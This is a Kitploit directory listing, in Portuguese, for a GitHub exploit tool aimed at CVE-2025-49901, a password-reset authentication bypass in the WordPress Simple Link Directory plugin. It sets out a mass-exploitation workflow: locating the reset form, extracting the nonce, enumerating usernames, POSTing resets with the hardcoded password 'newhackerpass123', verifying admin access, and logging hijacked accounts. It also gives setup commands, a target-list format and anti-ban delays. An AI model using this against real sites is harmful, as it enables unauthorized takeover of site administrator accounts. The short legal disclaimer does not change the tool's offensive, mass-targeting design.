Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49901 — O plugin Simple Link Directory para WordPress versão anterior a 14.8.1 é vulnerável a uma quebra de autenticação de alta prioridade. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-49901
Autenticação e AutorizaçãoReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubnxploited/cve-2025-49901

CVE-2025-49901

O plugin Simple Link Directory para WordPress versão anterior a 14.8.1 é vulnerável a uma quebra de autenticação de alta prioridade.

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-49901

O Plugin Simple Link Directory do WordPress < 14.8.1 é vulnerável a uma Quebra de Autenticação de alta prioridade

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Authentication Bypass → Password Reset → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ Vulnerabilidade

O formulário de redefinição de senha qc-opd exposto nas páginas SLD aceita um nome de usuário e uma nova senha sem verificar a identidade do usuário por meio de qualquer token, confirmação por e-mail ou verificação de capacidade. Um atacante não autenticado pode enumerar nomes de usuário do WordPress, enviar o formulário de redefinição para qualquer conta e autenticar imediatamente com a senha injetada — obtendo acesso de administrador sem nenhuma interação do usuário alvo.


▸ Fluxo de Ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                               │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form  │
│                                                         │
│  2. Extract nonce                                       │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce        │
│                                                         │
│  3. Enumerate usernames                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reset password for each username                    │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verify access (dual mode)                           │
│     Session mode  → cookie check + /wp-admin/ probes    │
│     Password mode → wp-login.php + admin panel check    │
│                                                         │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ Configuração

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ Uso

root@kitploit:~
Arquivo de lista de alvos          →  list.txt  (um host por linha)
Threads                    →  padrão 5
Timeout HTTP               →  padrão 10s
Atraso por usuário MIN/MAX     →  limitador anti-ban  (padrão 0.3 / 0.7s)
Atraso entre sites        →  padrão 1.0s
Arquivo de saída                →  scan_results/reset_mass_success.txt

Formato dos alvos:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

Senha fixa injetada em todas as redefinições:

root@kitploit:~
newhackerpass123

▸ Fontes de Enumeração de Nomes de Usuário

MétodoEndpoint
Redirecionamento de autor →

▸ Lógica de Verificação de Administrador

Após cada tentativa de redefinição, a ferramenta verifica o acesso usando dois métodos independentes:

root@kitploit:~
Session mode   →  checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  →  full wp-login.php POST + multi-path admin panel probe

Indicadores de administrador verificados:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ Formato de Saída do Terminal

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ Arquivo de Saída

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ Autor

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ Aviso Legal

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Fixed in 14.8.1

Baixar ferramenta
CVECVE-2025-49901
CVSS9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
Pluginquantumcloud Simple Link Directory (qc-simple-link-directory)
AfetadoTodas as versões < 14.8.1
AutenticaçãoNenhuma necessária
TipoAuthentication Bypass via Alternate Path (CWE-288)
CWECWE-288 · Authentication Bypass Using an Alternate Path or Channel
/?author=1
/?author=10
REST API/wp-json/wp/v2/users
Nome do hostPrimeiro rótulo do domínio como fallback
Codificadoadmin sempre incluído